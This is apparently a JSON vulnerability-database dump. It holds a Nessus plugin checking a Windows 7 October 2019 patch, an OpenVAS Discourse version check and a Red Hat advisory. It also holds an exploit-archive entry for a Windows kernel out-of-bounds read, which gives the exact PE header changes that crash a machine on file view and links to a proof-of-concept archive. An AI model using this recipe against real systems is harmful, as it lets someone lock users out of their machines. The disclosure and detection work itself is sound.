(CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2019-1361)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. 
An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\");\n # https://support.microsoft.com/en-us/help/4519976/windows-7-update-kb4519976\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60746595\");\n # https://support.microsoft.com/en-us/help/4520003/windows-7-update-kb4520003\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5576f622\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4520003 or Cumulative Update KB4519976.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4519976', '4520003');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4519976, 4520003])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-12-04T11:59:26", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-10-10T00:00:00", "published": "2019-10-10T00:00:00", "id": "1337DAY-ID-33363", "href": "https://0day.today/exploit/description/33363", "title": "Windows Kernel - Out-of-Bounds Read in CI!CipFixImageType While Parsing Malformed PE File", "type": "zdt", "sourceData": "We have encountered a Windows kernel crash in CI!CipFixImageType while trying to load a malformed PE image into 
the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below:\r\n\r\n--- cut ---\r\n*** Fatal System Error: 0x00000050\r\n (0xFFFFF8007B6E00AC,0x0000000000000000,0xFFFFF80079A7E5C1,0x0000000000000000)\r\n\r\nDriver at fault: \r\n*** CI.dll - Address FFFFF80079A7E5C1 base at FFFFF80079A30000, DateStamp 8581dc0d\r\n.\r\nBreak instruction exception - code 80000003 (first chance)\r\n\r\nA fatal system error has occurred.\r\nDebugger entered on first try; Bugcheck callbacks have not been invoked.\r\n\r\nA fatal system error has occurred.\r\n\r\n[...]\r\n\r\n*******************************************************************************\r\n* *\r\n* Bugcheck Analysis *\r\n* *\r\n*******************************************************************************\r\n\r\nPAGE_FAULT_IN_NONPAGED_AREA (50)\r\nInvalid system memory was referenced. This cannot be protected by try-except.\r\nTypically the address is just plain bad or it is pointing at freed memory.\r\nArguments:\r\nArg1: fffff8007b6e00ac, memory referenced.\r\nArg2: 0000000000000000, value 0 = read operation, 1 = write operation.\r\nArg3: fffff80079a7e5c1, If non-zero, the instruction address which referenced the bad memory\r\n\taddress.\r\nArg4: 0000000000000000, (reserved)\r\n\r\n[...]\r\n\r\nTRAP_FRAME: fffffa8375df1860 -- (.trap 0xfffffa8375df1860)\r\nNOTE: The trap frame does not contain all registers.\r\nSome register values may be zeroed or incorrect.\r\nrax=0000000000000000 rbx=0000000000000000 rcx=0000000000000000\r\nrdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000\r\nrip=fffff80079a7e5c1 rsp=fffffa8375df19f0 rbp=fffffa8375df1b30\r\n r8=00000000000000c0 r9=fffff8007b6d0080 r10=0000000000000004\r\nr11=fffff8007b6e0070 r12=0000000000000000 r13=0000000000000000\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz ac po 
cy\r\nCI!CipFixImageType+0x9d:\r\nfffff800`79a7e5c1 418b44cb3c mov eax,dword ptr [r11+rcx*8+3Ch] ds:fffff800`7b6e00ac=????????\r\nResetting default scope\r\n\r\nLAST_CONTROL_TRANSFER: from fffff80077ea6642 to fffff80077dc46a0\r\n\r\nSTACK_TEXT: \r\nfffffa83`75df0e18 fffff800`77ea6642 : fffff800`7b6e00ac 00000000`00000003 fffffa83`75df0f80 fffff800`77d22be0 : nt!DbgBreakPointWithStatus\r\nfffffa83`75df0e20 fffff800`77ea5d32 : fffff800`00000003 fffffa83`75df0f80 fffff800`77dd0fb0 fffffa83`75df14c0 : nt!KiBugCheckDebugBreak+0x12\r\nfffffa83`75df0e80 fffff800`77dbca07 : ffff8ac5`62b15f80 fffff800`77ed0110 00000000`00000000 fffff800`78063900 : nt!KeBugCheck2+0x952\r\nfffffa83`75df1580 fffff800`77de0161 : 00000000`00000050 fffff800`7b6e00ac 00000000`00000000 fffffa83`75df1860 : nt!KeBugCheckEx+0x107\r\nfffffa83`75df15c0 fffff800`77c7aaef : 00000000`00000000 00000000`00000000 00000000`00000000 fffff800`7b6e00ac : nt!MiSystemFault+0x1d3171\r\nfffffa83`75df16c0 fffff800`77dca920 : fffff800`7b6d0000 00000000`00000000 ffffe687`5031c180 00000000`00000000 : nt!MmAccessFault+0x34f\r\nfffffa83`75df1860 fffff800`79a7e5c1 : ffffe687`4f6b1080 fffff800`7b6d0080 00000000`00000000 fffff800`79a67280 : nt!KiPageFault+0x360\r\nfffffa83`75df19f0 fffff800`79a7c879 : fffffa83`75df1cd0 00000000`00000000 00000000`c00000bb 00000000`00000000 : CI!CipFixImageType+0x9d\r\nfffffa83`75df1a30 fffff800`78285766 : fffffa83`75df1c70 fffff800`7b6d0000 00000000`0000000e fffff800`7b6d0000 : CI!CiValidateImageHeader+0x279\r\nfffffa83`75df1bb0 fffff800`7828528a : 00000000`00000000 00000000`00000001 00000000`00000000 00000000`00011000 : nt!SeValidateImageHeader+0xd6\r\nfffffa83`75df1c60 fffff800`7821e0da : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!MiValidateSectionCreate+0x436\r\nfffffa83`75df1e50 fffff800`781fc861 : fffffa83`75df2180 fffffa83`75df1fb0 00000000`40000000 fffffa83`75df2180 : nt!MiValidateSectionSigningPolicy+0xa6\r\nfffffa83`75df1eb0 fffff800`781dca20 : 
ffffe687`5031c180 fffffa83`75df2180 fffffa83`75df2180 ffffe687`5031c150 : nt!MiCreateNewSection+0x5ad\r\nfffffa83`75df2010 fffff800`781dcd24 : fffffa83`75df2040 ffffd483`86519790 ffffe687`5031c180 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0\r\nfffffa83`75df2100 fffff800`781dc37f : 00000000`11000000 fffffa83`75df24c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4\r\nfffffa83`75df2280 fffff800`781dc110 : 000000bc`f7c78928 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff\r\nfffffa83`75df2360 fffff800`77dce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60\r\nfffffa83`75df23d0 00007ffe`5771c9a4 : 00007ffe`54641ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25\r\n000000bc`f7c788b8 00007ffe`54641ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14\r\n000000bc`f7c788c0 00007ffe`54645640 : 00000203`34a8b3d0 00000007`00000000 00007ffe`56d32770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7\r\n000000bc`f7c78af0 00007ffe`5462c41d : 00000203`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0\r\n000000bc`f7c78b60 00007ffe`559f03d1 : 00000203`34a79130 00000000`00000000 00000203`34a96190 00007ffe`55a06d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d\r\n000000bc`f7c78bc0 00007ffe`559f035c : 00000000`00000000 00007ffe`549f10ff 00000203`34a79130 000000bc`f7c78f10 : shell32!_LoadVersionInfo+0x39\r\n000000bc`f7c78c30 00007ffe`54a6c1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c\r\n\r\n[...]\r\n--- cut ---\r\n\r\nThe direct cause of the crash is an attempt to read from an invalid out-of-bounds address relative to the kernel mapping of the parsed PE file. 
Specifically, we believe that it is caused by the lack of proper sanitization of the IMAGE_FILE_HEADER.SizeOfOptionalHeader field.\r\n\r\nWe have minimized one of the crashing samples down to a 3-byte difference in relation to the original file: one which increases the value of the SizeOfOptionalHeader field from 0x00e0 to 0x66e0, one that decreases SizeOfImage from 0x8400 to 0x0e00, and one that changes DllCharacteristics from 0 to 0x89 (IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY | 9).\r\n\r\nThe issue reproduces on Windows 10 and Windows Server 2019 (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could be also potentially exploited as a limited information disclosure primitive.\r\n\r\nAttached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and three additional non-minimized samples. 
Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47486.zip\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://0day.today/exploit/33363"}], "openvas": [{"lastseen": "2019-08-29T14:54:53", "bulletinFamily": "scanner", "description": "Discourse is prone to multiple vulnerabilities in Ruby on Rails.", "modified": "2019-08-28T00:00:00", "published": "2019-06-17T00:00:00", "id": "OPENVAS:1361412562310108598", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108598", "title": "Discourse < 2.3.0.beta5 Multiple Vulnerabilities", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:discourse:discourse\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108598\");\n script_version(\"2019-08-28T13:27:25+0000\");\n script_cve_id(\"CVE-2019-5418\", \"CVE-2019-5419\", \"CVE-2019-5420\");\n script_tag(name:\"last_modification\", value:\"2019-08-28 13:27:25 +0000 (Wed, 28 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-17 06:03:35 +0000 (Mon, 17 Jun 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Discourse < 2.3.0.beta5 Multiple Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_discourse_detect.nasl\");\n script_mandatory_keys(\"discourse/detected\");\n\n script_tag(name:\"summary\", value:\"Discourse is prone to multiple vulnerabilities in Ruby on Rails.\");\n\n script_tag(name:\"affected\", value:\"Discourse before version 2.3.0.beta5.\");\n\n script_tag(name:\"solution\", value:\"Update to version 2.3.0.beta5.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://meta.discourse.org/t/discourse-2-3-0-beta5-release-notes/111727\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! 
infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:TRUE ) )\n exit( 0 );\n\nvers = infos[\"version\"];\n\nif( version_is_less( version:vers, test_version:\"2.3.0\" ) ||\n version_in_range( version:vers, test_version:\"2.3.0.beta1\", test_version2:\"2.3.0.beta4\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"2.3.0.beta5\", install_path:infos[\"location\"] );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:44:51", "bulletinFamily": "unix", "description": "Red Hat CloudForms Management Engine delivers the insight, control, and automation needed to address the challenges of managing virtual environments. CloudForms Management Engine is built on Ruby on Rails, a model-view-controller (MVC) framework for web application development. Action Pack implements the controller and the view components.\n\nSecurity Fix(es):\n\n* rubygem-actionpack: render file directory traversal in Action View (CVE-2019-5418)\n\n* rubygem-actionpack: denial of service vulnerability in Action View (CVE-2019-5419)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nThis update fixes various bugs and adds enhancements. Documentation for these changes is available from the Release Notes document linked to in the References section.", "modified": "2019-05-29T16:39:07", "published": "2019-05-29T16:36:40", "id": "RHSA-2019:1289", "href": "https://access.redhat.com/errata/RHSA-2019:1289", "type": "redhat", "title": "(RHSA-2019:1289) Important: CloudForms 4.6.9 security, bug fix and enhancement update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}